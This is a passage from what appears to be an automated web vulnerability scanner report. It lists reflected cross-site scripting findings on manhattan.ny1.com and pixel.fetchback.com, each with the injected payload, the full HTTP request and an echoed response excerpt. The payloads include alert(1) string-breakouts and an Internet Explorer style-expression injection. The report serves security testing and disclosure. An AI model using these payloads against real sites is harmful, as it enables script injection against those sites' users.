OguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAjBvFyAAAAAA./cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..e4fb3'-alert(1)-'79dc16e5093/referrer=http%3A%2F%2Fwww.quickyellow.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Y
...[SNIP]...

2.21. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4fd7'%3b4584f664dff was submitted in the REST URL parameter 1. This input was echoed as d4fd7';4584f664dff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skinsd4fd7'%3b4584f664dff/news1/favicon.ico HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56082
Vary: Accept-Encoding
Cache-Control: public, max-age=550
Expires: Fri, 01 Apr 2011 18:20:40 GMT
Date: Fri, 01 Apr 2011 18:11:30 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://manhattan.ny1.com:80/App_Skinsd4fd7';4584f664dff/news1/favicon.ico'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.22. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6514e'%3bd51675d856b was submitted in the REST URL parameter 2. This input was echoed as 6514e';d51675d856b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skins/news16514e'%3bd51675d856b/favicon.ico HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56080
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:42 GMT
Date: Fri, 01 Apr 2011 18:11:42 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://manhattan.ny1.com:80/App_Skins/news16514e';d51675d856b/favicon.ico'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.23. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf1'%3b7079e6feb81 was submitted in the REST URL parameter 3. This input was echoed as acaf1';7079e6feb81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /App_Skins/news1/favicon.icoacaf1'%3b7079e6feb81 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56170
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:53 GMT
Date: Fri, 01 Apr 2011 18:11:53 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/App_Skins/news1/favicon.icoacaf1';7079e6feb81/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.24. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42631'%3bc0299a9928d was submitted in the REST URL parameter 1. This input was echoed as 42631';c0299a9928d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content42631'%3bc0299a9928d/ServeContent.aspx?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56119
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:02 GMT
Date: Fri, 01 Apr 2011 18:11:02 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content42631';c0299a9928d/ServeContent.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.25. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86be6'%3b2133abcc347 was submitted in the REST URL parameter 2. This input was echoed as 86be6';2133abcc347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeContent.aspx86be6'%3b2133abcc347?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56167
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:09 GMT
Date: Fri, 01 Apr 2011 18:11:09 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeContent.aspx86be6';2133abcc347/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.26. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf4b'%3b8443ca8f92f was submitted in the REST URL parameter 1. This input was echoed as bdf4b';8443ca8f92f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Contentbdf4b'%3b8443ca8f92f/ServeResource.aspx?id=687&ticks=1915729545 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1915729545
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56125
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:06 GMT
Date: Fri, 01 Apr 2011 18:11:06 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Contentbdf4b';8443ca8f92f/ServeResource.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.27. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa860'%3b7174f58ce9f was submitted in the REST URL parameter 2. This input was echoed as fa860';7174f58ce9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeResource.aspxfa860'%3b7174f58ce9f?id=687&ticks=1915729545 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1915729545
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56168
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:13 GMT
Date: Fri, 01 Apr 2011 18:11:13 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeResource.aspxfa860';7174f58ce9f/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.28. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /content/top_stories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67a1'%3b361ba9d45fb was submitted in the REST URL parameter 1. This input was echoed as b67a1';361ba9d45fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /contentb67a1'%3b361ba9d45fb/top_stories/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56145
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:29 GMT
Date: Fri, 01 Apr 2011 18:11:29 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/contentb67a1';361ba9d45fb/top_stories/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.29. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /content/top_stories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc2d4'%3b52263977e93 was submitted in the REST URL parameter 2. This input was echoed as dc2d4';52263977e93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /content/top_storiesdc2d4'%3b52263977e93/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56146
Vary: Accept-Encoding
Cache-Control: public, max-age=564
Expires: Fri, 01 Apr 2011 18:20:59 GMT
Date: Fri, 01 Apr 2011 18:11:35 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/content/top_storiesdc2d4';52263977e93/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.30. http://manhattan.ny1.com/content/top_stories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://manhattan.ny1.com
Path:   /content/top_stories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6532b'-alert(1)-'736431dcdb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/top_stories/?6532b'-alert(1)-'736431dcdb1=1 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:24 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 86281
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:26 GMT
Date: Fri, 01 Apr 2011 18:11:26 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - - NY1.com
</title><me
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?SectionPath=%2fcontent%2ftop_stories%2f&6532b'-alert(1)-'736431dcdb1=1'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload a1c83<x%20style%3dx%3aexpression(alert(1))>6abbaef0b4c was submitted in the name parameter. This input was echoed as a1c83<x style=x:expression(alert(1))>6abbaef0b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landinga1c83<x%20style%3dx%3aexpression(alert(1))>6abbaef0b4c&sid=3047 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300993416_20056:6436:8:0_15292:30504:1:161993_19000:38838:1:162006_20053:24803:11:351268_20054:24802:1:351668_14598:11789:1:1624812; kwd=1_1300993416_11317:582230_11717:582230_11718:582230_11719:582230_11722:690865_10827:690865_10842:690869_10839:690869_10824:691069; scg=1_1300993416; ppd=1_1300993416; uid=1_1300993418_1297862321306:0415785655118336; eng=1_1300993418_20056:0

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1301677315_11259:9_10164:1266129_10638:1266129_10640:1266129_10641:1266129_1437:1266129_8900:1266168_9081:1374745_9085:1374745_8956:1374745_9083:1374768_9084:1374768_8956:1374768_20:2507591; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: uid=1_1301677315_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: kwd=1_1301677315_11317:1266129_11717:1266129_11718:1266129_11719:1266129_11722:1374764_10827:1374764_10842:1374768_10839:1374768_10824:1374968; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: sit=1_1301677315_3047:9:9_2701:1266168:1266168_719:1266250:1266129_2707:1374968:1374745_3225:1656406:1656406_828:2178921:2178921_11:2582846:2507591_3314:2586584:2505500_3289:2587834:2582347_2002:3814994:3813773; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: cre=1_1301677315_20056:6436:8:683899_15292:30504:1:845892_19000:38838:1:845905_20053:24803:11:1035167_20054:24802:1:1035567_14598:11789:1:2308711; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
